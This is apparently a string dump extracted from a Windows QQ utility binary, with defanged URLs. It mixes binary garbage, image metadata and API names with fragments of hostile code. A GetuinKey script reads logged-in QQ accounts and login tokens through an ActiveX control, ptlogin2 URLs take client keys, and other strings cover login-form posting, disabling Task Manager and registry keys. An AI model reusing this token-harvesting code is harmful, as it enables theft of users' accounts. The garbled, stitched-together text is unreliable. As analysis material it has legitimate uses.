xmpMM:DocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3" xmpMM:OriginalDocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3"> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>7452EAA947F05F965163273867BD9D42</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:CBC1FEE60637E211889AB7A996EA88D3" stEvt:when="2012-11-25T22:01:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8E9AE39D9638E211B42E979B5C32BBAA" stEvt:when="2012-11-27T22:23:35 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:5D4AFA270E4DE211BE13DB00DCC3E507" stEvt:when="2012-12-23T23:25:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:5E4AFA270E4DE211BE13DB00DCC3E507" stEvt:when="2012-12-23T23:25:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5D4AFA270E4DE211BE13DB00DCC3E507" stRef:documentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3" stRef:originalDocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
=%UTn
]x%X !G
&,H.AU
U]EÍc
.GxVnL6b
{%DrG<xt
#\-X}
.Smm\
?.rW1
6%dMZK
.awWZ
E%%dQ
0m.Ya
WGWAQ-%u5E
mrbin\BT.jpg
2012:12:24 15:15:40
.YpG!
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2012-11-25T22:01:04 08:00" xmp:MetadataDate="2012-12-24T15:15:40 08:00" xmp:ModifyDate="2012-12-24T15:15:40 08:00" photoshop:LegacyIPTCDigest="504EF1334714865C645787C8C5A27D47" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:09E5F7B8994DE2119B17FE9C865DCC20" xmpMM:DocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3" xmpMM:OriginalDocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3"> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>7452EAA947F05F965163273867BD9D42</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:CBC1FEE60637E211889AB7A996EA88D3" stEvt:when="2012-11-25T22:01:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8E9AE39D9638E211B42E979B5C32BBAA" stEvt:when="2012-11-27T22:23:35 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:594AFA270E4DE211BE13DB00DCC3E507" stEvt:when="2012-12-23T23:19:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:5A4AFA270E4DE211BE13DB00DCC3E507" stEvt:when="2012-12-23T23:19:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:09E5F7B8994DE2119B17FE9C865DCC20" stEvt:when="2012-12-24T15:15:40 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:594AFA270E4DE211BE13DB00DCC3E507" stRef:documentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3" stRef:originalDocumentID="xmp.did:CBC1FEE60637E211889AB7A996EA88D3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
r=%dh
c.MA/5
'-M=.gm
%XlI}
÷/C
v%SPk!
KEY[;
`*g%u1p
l:\kb
;jL.Sq
%FvdJ
5.UE)^
Y,oY%E^g%5UL
T&%sS
%ujPV
.YP\%
%fSm@
hXXp://yigewang.duapp.com/cangtoushi.php?m=app_cang
application/x-www-form-urlencoded
adodb.stream
(7),01444
'9=82<.342
%Documents and Settings%\Administrator\
 5y%d
.MSqr|
#OW'%F
)M.eo
1IY%ue
;J.jnpP
ZK[%s
bkb*be.ibgVM
[b.mJ
z.xo}
X-Auth: app_key="android5kqgz411075kqgz",nonce="{nonce}",signature="{signature}"
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; Lan998 Build/GRJ22)
Host: nlp.xiaoi.com
hXXp://nlp.xiaoi.com/ask
function time(){return new Date().getTime()}
Adodb.Stream
&appid=549000912&js_ver=10087&js_type=1&login_sig=InvRtY7H*ZG79ztQPKRxtdoDNLRkR6Q89qnoD*WLZmqGiP7871i-e3GahtQFqK3-&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
hXXp://captcha.qq.com/getimage?uin=
hXXp://tieba.baidu.com/cuseraudit/browser
hXXp://VVV.pianzib.com/pianzi.php
action=report&type=3&key=
hXXp://VVV.pctowap.com/air/ebook12.3g.qq.com/user/usecard?sid=
&g_ut=1/air/ebook12.3g.qq.com/user/recieveAllGifts?
hXXp://VVV.pctowap.com/air/ebook12.3g.qq.com/user/recieveAllGifts?sid=
hXXp://pt.3g.qq.com/s?aid=nLogin3gqq
3gqqLogin?r=
hXXp://pt.3g.qq.com/psw3gqqLogin?r=
&bid_code=3GQQ&toQQchat=true&login_url=http://pt.3g.qq.com/s?aid=nLoginnew&q_from=3GQQ&q_from=&modifySKey=0&loginType=1&aid=nLoginHandle&go_url=http://info.3g.qq.com/g/s?aid=index&login=false&sid=AT9g_bDsFg4VxdRdwiLPSoC7&rand=270871
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
&submitlogin=马上登录
&loginType=1&login_url=http://pt.3g.qq.com/s?aid=nLoginnew&q_from=3GQQ&extend=http://nvcsz.gtimg.com/824820467/738363146392468628&r_sid=
&hexp=true&auto=0&loginTitle=手机腾讯网&q_from=&modifySKey=0&q_status=10&r=
`~!@#$%^&*()-_= [{]};:'\|,<.>/?"
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
&spec=100&url_enc=0&referer=bu_interface&term_type=PC
hXXp://q2.qlogo.cn/headimg_dl?bs=
hXXp://qqshow-user.tencent.com/
hXXp://b.qzone.qq.com/cgi-bin/custom/output_custom_window.cgi?uin=
(*.exe)|*.exe
.ecode
krnln.fne
krnln.fnr
1.1.3
cmd /c start
.gegI
IZ)%X
Xj-k}
(s@8VcH(%c
o_g%X
u%sN[?U
=%X\w
y%Ux\
[?%s\
Mx.hLd
q@}@%S
5].fh
Z:\& 
/lK.xj
DD.dNP~
A>c>%C
A*!.hn
gDqP2I%f
76.iJ
`%8xW
Wf.EHE
ls.RC
&.FRTq
lS|e.JhK?e
w.gT-
.AncV
.Jd<~
%xjW<(
.VuqP
P%sVw=$1U
ZpX.Qycx
'6.PHg;!
vI.pQ
.ymbm
_%S>^
xx.HJm
.vof@j4
L4.xDw
nd.fx
nW.Xv
.oj#=
A*U%F'
9A.eac
W7(%sL
-RK}`m
8bV%d_]H
S=.jf
.kf:]T
.xp\j
?,^.kJ
\%Dkr<
.Bxm;
L.gf*
%uB=:',{
.qaw 
PTF://
b1.jpg
d1.jpg
VER=1.4&CON=1&CMD=VERIFYCODE&SEQ=
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Thunder.exe
ThunderPlatform.exe
\Thunder.exe
\ThunderPlatform.exe
hXXp://tieba.baidu.com/f?ie=utf-8&kw=
PageData.tbs = "
hXXp://tieba.baidu.com/sign/add
*.ico
|*.ico
knn.JOO/d
hXXp://tieba.baidu.com/f?kw=·ÇÕý³£ÈËÀàÑо¿Ñ§Ôº
hXXp://m.1006.tv/zt/97238
hXXp://VVV.cx90.net
hXXp://VVV.kaopu001.com/
hXXp://VVV.bilibili.com/video/av1534770/
hXXp://exp.qq.com/
\ameng.png
\ameng.bmp
hXXp://VVV.huoyan.tv/api.php#!u=
hXXp://check.ptlogin2.qq.com/check?uin=
&aid=15004501&u1=http://ctc.qzs.qq.com/ac/qzone/login/succ.html?para=toolbar&h=1&ptredirect=0&ptlang=2052&from_ui=1&dumy=&fp=loginerroralert&mibao_css=&t=1&g=1
hXXp://ptlogin2.qq.com/login?u=
skey=
return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C  = 16) {
for (var B = 0; B < D.length * chrsz; B  = chrsz) {
C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B  = chrsz) {
D  = String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A  ) {
D  = B.charAt((C[A >> 2] >> ((A % 4) * 8   4)) & 15)   B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
return(Math.random());
return(date.getTime());
hXXp://api.t.qq.com/old/follow.php
&veriCode=&lieuId=&apiType=8&apiHost=http://api.t.qq.com
33333333333330
33333333
hXXp://VVV.dywt.com.cn/onlinestudy/jc/jc.rar
hXXp://wpa.qq.com/pa?p=1:
hXXp://m.qzone.qq.com/cgi-bin/new/get_msgb?hostUin=
hXXp://VVV.socialland.net/tmpsms/gateway.php
QQ.exe QQ
|QQ.exe
VER=1.4&CON=2&CMD=Login&SEQ=
211.136.236.88
 (-1)/(2)
Fjfcs.ttf
Fqmt.ttf
Fbzcs.ttf
Flfc.ttf
Fhaku.ttf
Fzql.ttf
Fyqk.ttf
hXXp://VVV.umjoy.com/
'Default.rdb'
|Default.rdb
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META name=Keywords content=QQ,
<META name=Copyright content=Tencent><LINK rel=stylesheet type=text/css href="hXXp://imgcache.qq.com/bossweb/pay/pay_v4/css/qqtips.css" charset=utf-8>
<SCRIPT type=text/javascript src="hXXp://api.unipay.qq.com/v1/r/qzone/get_pay_info?sck=6774f82f552560b681917f6d20ce331b&cmd=recharge_succ&rr=0.6478132367977145"></SCRIPT>
</SPAN></A> <SPAN style="DISPLAY: none" id=loading class=btn_hint><IMG src="hXXp://imgcache.qq.com/bossweb/pay/public/load.gif">
<P id=open_error_msg></P></DIV>
T.recommend = {};
T.retryUrl = {};
T.enableQuick = {
T.init = function(){
LIB.gray('789', {succ:function(){
'sck='   hex_md5(LIB.cookie.get('uin')   LIB.cookie.get('skey')),
'cmd=recharge_succ',
'rr='   Math.random()
LIB.loader('hXXp://api.unipay.qq.com/v1/r/qzone/get_pay_info?'   params.join('&'));
T.noRecommend();
IPAY._action_report_callback = function(){};
T.report = function(action){
var service = T.recommend.serviceCode.toLowerCase();
LIB.loader(['hXXp://upayportal.qq.com/cgi-bin/action_report.fcg?ch=self&uin=',T.uin,'&aid=&service=',service,'&sessionid=', T.uin, new Date().getTime(), '&rr=',Math.random(),'&extend=&action=',action].join(""));
if (!~~data.ret && data.sc && T.enableQuick[data.sc.toLowerCase()]) {//
var code = data.sc.toLowerCase();
T.recommend.serviceCode = code.toUpperCase();
T.recommend.month = data.open_month;
T.recommend.date = data.time;
document.getElementById('service_code_i').className = 'li_' code;
document.getElementById('service_name_s').innerHTML = INFO.services[code].name;
document.getElementById('service_date').innerHTML = data.time;
document.getElementById('service_month').innerHTML = data.open_month;
document.getElementById('result_recommend_div').style.display = '';
document.getElementById('subtitle').style.display = '';
T.retryUrl.xxjzgw = T.retryUrl.xxjzghh = "hXXp://pay.qq.com/ipay/index.shtml?c=xxjzghh,xxjzgw&n=" T.recommend.month "&ch=qdqb,kj&aid=pay.service.ipay.qqtips_recharge&ADTAG=PAY.SERVICE.IPAY.QQTIPS_RECHARGE";
T.report('tips_service.pv.qdqb');
T.noRecommend = function(){
document.getElementById('result_common_div').style.display = '';
T.jump = function(url){
var _login_cgi = 'hXXp://pay.qq.com/cgi-bin/account/payjump.cgi?';
window.open(_login_cgi 'uin=' LIB.cookie.get('uin') '&skey=' LIB.cookie.get('skey') '&url=' encodeURIComponent(url));
T.quickOpen = function(){
var url = "hXXp://upayportal.qq.com/cgi-bin/uniform_pay.fcg?", _arr = [];
_arr.push('pay_num='   T.uin);
_arr.push('user_num='   T.uin);
_arr.push('service_code='   T.recommend.serviceCode);
_arr.push('open_month='   T.recommend.month);
_arr.push('auto_pay=' (document.getElementById("autopay").checked ? 1 : 0));
_arr.push('open_mode=1');
_arr.push('pay_way=2');
_arr.push('vendor_type=4');
_arr.push('source=1');
_arr.push('serve=1');
_arr.push('req_source=1');
_arr.push('if_callback=1');
_arr.push('callback_url=http://pay.qq.com/ipay/callback.shtml');
_arr.push('aid4open=pay.service.ipay.qqtips_recharge');
_arr.push('from=pay');
_arr.push('sck='   hex_md5(LIB.cookie.get('skey')));
_arr.push("r="   Math.random());
document.getElementById("uniformIfrm").src = url   _arr.join('&');
document.getElementById("autopay_wrap").style.display = 'none';
document.getElementById("loading").style.display = '';
T.report('tips_service.click_open.qdqb');
QDQB.protectAccount = function(){
document.getElementById("wrap").style.display = "none";
document.getElementById("uniformIfrm").style.display = "";
T.report('tips_service.protect.qdqb');
document.getElementById("subtitle").style.display = 'none';
document.getElementById("uniformIfrm").style.display = "none";
document.getElementById("wrap").style.display = "";
document.getElementById("result_recommend_div").style.display = "none";
if (!~~data.result) {
document.getElementById("result_success_div").style.display = "";
document.getElementById("open_month").innerHTML = data.pre_open_month;
document.getElementById("open_name").innerHTML = data.service_name;
T.report('tips_service.open_success.qdqb');
document.getElementById("result_fail_div").style.display = "";
document.getElementById("open_error_msg").innerHTML = data.result_info;
document.getElementById("reopen").onclick = function(){
T.jump(T.retryUrl[T.recommend.serviceCode.toLowerCase()] || 'hXXp://pay.qq.com/ipay/index.shtml?n=' T.recommend.month '&ch=qdqb,kj&aid=pay.service.ipay.qqtips_recharge&ADTAG=PAY.SERVICE.IPAY.QQTIPS_RECHARGE&c=' T.recommend.serviceCode);
T.report('tips_service.open_fail.qdqb');
T.init();
<SCRIPT type=text/javascript charset=utf-8 src="hXXp://pingjs.qq.com/tcss.ping.js"></SCRIPT>
onclick='TIPS.jump("hXXp://c.l.qq.com/lclick?seq=20110505000108&loc=pay_F_banner&soid=12161BAC000050CA980E16105500");return false;' href="javascript:void 0;"><IMG alt=10
src="hXXp://imgcache.qq.com/bossweb/pay/pay_v4/pic/xxjzgw/ad.jpg"></A> </DIV></DIV>
<SCRIPT type=text/javascript charset=utf-8 src="hXXp://imgcache.qq.com/bossweb/ipay/js/lib/lib.js"></SCRIPT>
<SCRIPT type=text/javascript charset=utf-8 src="hXXp://imgcache.qq.com/bossweb/ipay/js/info_v4.js"></SCRIPT>
document.domain = "qq.com";
w.QDQB = {};
w.IPAY = {};
var T = w.TIPS = {};
T.uin = "
\gfqbczxy.ini
iniqr.ini
{}{|}}{|
{~{{|~|{}~
~~~~||~|}}}
}|~}|}}~~~
}~}~}~}~~}
c1.jpg
:6836188
hXXp://VVV.pianzib.com/qq/
Adobe Photoshop CS3 Windows
2013:05:26 16:12:35
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.276720, Mon Feb 19 2007 22:40:08 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xap="hXXp://ns.adobe.com/xap/1.0/" xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/" xmlns:exif="hXXp://ns.adobe.com/exif/1.0/" dc:format="image/jpeg" xap:CreatorTool="Adobe Photoshop CS3 Windows" xap:CreateDate="2013-05-26T16:12:35 08:00" xap:ModifyDate="2013-05-26T16:12:35 08:00" xap:MetadataDate="2013-05-26T16:12:35 08:00" xapMM:DocumentID="uuid:50FA44E7DBC5E211ABBE955444891B46" xapMM:InstanceID="uuid:51FA44E7DBC5E211ABBE955444891B46" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" photoshop:History="" tiff:Orientation="1" tiff:XResolution="720000/10000" tiff:YResolution="720000/10000" tiff:ResolutionUnit="2" tiff:NativeDigest="256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;788E4A58534F5B9ED5E8EC778D3A5489" exif:PixelXDimension="240" exif:PixelYDimension="240" exif:ColorSpace="1" exif:NativeDigest="36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;2D7AA8C7129796C460F9F40D18362D5D"> <xapMM:DerivedFrom stRef:instanceID="uuid:4FFA44E7DBC5E211ABBE955444891B46" stRef:documentID="uuid:4FFA44E7DBC5E211ABBE955444891B46"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
hXXp://VVV.liyechong.com/xiazai/yundequdaili.html
(*.jpg;*.bmp;*.gif;*.png;*.tiff)|*.jpg;*.bmp;*.gif;*.png;*.tiff
*.jpg;*.bmp
|*.ico;*.bmp
.html
hXXp://hi.baidu.com/aumcc/item/d44e96d840e6ac47fa5768ef
QPtools.ini
Beta5.0.7
6836188
hXXp://wp.qq.com/wpa/qunwpa?idkey=0e7862db6e9b55d86299a721dfd8656f33e070b446cd27dcd1236c67ec432f60
hXXp://hi.baidu.com/aumcc/item/b6cced0f1ab10e19cd34ea4f
:5.0.7Beta
L?A]dA
E7m.Lz
X.Clo
(%S3<
2Z.Jr
.PYtf
.rmL]
.tFO}
oi%xC
u-.oZ
xx
\G%X?
hs'%XZ
5-eY}s
.ZWs]
c.ud~K
.BO/@
Qv.Kf
.LhrZq
^h_L%X2
_K%X7
{-B}o
%x><?
hZP%c
ZWeB
hXXp://tools.54042ba828575.d01.nanoyun.com/md5Beta5.0.7.txt
hXXp://tools.54042ba828575.d01.nanoyun.com/tupian/gg1.jpg
GuestWAV.ini
&s%s%
%d%d%
#D%D%
( ( ?!?!
&3(3(#*#*
(f%f%
`!`!%"%"
(!(!2!2!3 3
5#5#S%S%
%U%U%
"7#7#0#0#1"1"
* * , , 4
!)")"$"$"|!|!) )
"|"|"#!#!
"&%&%#'#'
#^#^#{#{#}#}#
9@&keyindex=9&pt_aid=549000912&u1=http://qun.qzone.qq.com/group
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
&ua=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
hXXp://count.2881.com/count/count.asp?id=39023&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
c:\clientci\workspace\ime_screenshot_build\screenshot\Release\screen_snapshot.pdb
GetProcessHeap
ActivateKeyboardLayout
LoadKeyboardLayoutW
CreateDialogIndirectParamW
SetWindowsHookExW
GetKeyboardLayout
SetViewportOrgEx
COMDLG32.dll
RegEnumKeyExW
CryptDestroyKey
CryptImportKey
CryptSetKeyParam
RegDeleteKeyW
RegQueryInfoKeyW
RegCreateKeyExW
ShellExecuteW
IMM32.dll
MSIMG32.dll
====^^^^{{{{
{{{{^^^^====
0000````
````0000
C&&&e000w333~///w%%%f
%<<<{???
\Ssh>
6.pE?~
8,U.lB
UUU!UUUEUUUWUUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUU\UUUYUUUMUUU.UUU
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
&hXXps://VVV.globalsign.com/repository/03
"hXXp://crl.globalsign.net/root.crl0
&hXXps://VVV.globalsign.com/repository/0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0P
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt0
hXXp://shurufa.baidu.com0
H}l%u
VER=1.4&CON=1&CMD=Change_Stat&SEQ=
F1.jpg
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
hXXp://60s.pw/wangpan/zhuanhuan.php?url=
"url":"
2013:05:26 22:43:46
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.276720, Mon Feb 19 2007 22:40:08 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xap="hXXp://ns.adobe.com/xap/1.0/" xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/" xmlns:exif="hXXp://ns.adobe.com/exif/1.0/" dc:format="image/jpeg" xap:CreatorTool="Adobe Photoshop CS3 Windows" xap:CreateDate="2013-05-26T22:43:46 08:00" xap:ModifyDate="2013-05-26T22:43:46 08:00" xap:MetadataDate="2013-05-26T22:43:46 08:00" xapMM:DocumentID="uuid:F20BB0AB12C6E211905BB9A898DBE895" xapMM:InstanceID="uuid:F30BB0AB12C6E211905BB9A898DBE895" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" photoshop:History="" tiff:Orientation="1" tiff:XResolution="720000/10000" tiff:YResolution="720000/10000" tiff:ResolutionUnit="2" tiff:NativeDigest="256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;19C11EC23FD640188F769F9BC3E693C7" exif:PixelXDimension="544" exif:PixelYDimension="361" exif:ColorSpace="1" exif:NativeDigest="36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;2B82D3CF3E9A1DDC09A299F4E445A80E"> <xapMM:DerivedFrom stRef:instanceID="uuid:C772FC5A12C6E211905BB9A898DBE895" stRef:documentID="uuid:C772FC5A12C6E211905BB9A898DBE895"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
K%U",DH
b.VFD
RV.bR
%xito
%s<6x
t%dI:
yyy%x
\.NQ5k{{
.yyy{BBB>c2
hXXp://fm.baidu.com/
|*.MP3;*.WAV;*.WMA
&dont_remember_login_state=0
&login_type=0&pass_word=
locate=http://VVV.poco.cn/?_t_=1380454026203&warm_tag=1&CookieDate=1&act=login&user_name=
www1.poco.cn/module_common/login/poco_login_act.php
hXXp://VVV.poco.cn/?_t_=
C:\Windows\poco.ini
hXXp://my.poco.cn/manage/about_me.php#about_me_title
*.exe|*.exe
hXXp://tools.54042ba828575.d01.nanoyun.com/dizhi/dizhi1.txt
0{@hXXp://show.v.t.qq.com/index.php?c=show&a=index&n=miniaumcc&w=0&h=348&fl=1&l=30&o=17&co=1
hXXp://VVV.xunlei6.com/2.htm
webShiftPercentlong
2009:12:16 17:29:13
hXXp://api.ickd.cn/?id=CB79AA968478FF88815F0AA699ABE9A7&com=
hXXp://b11.cnc.qzone.qq.com/cgi-bin/blognew/quote_blog?ref=qzone&g_tk=
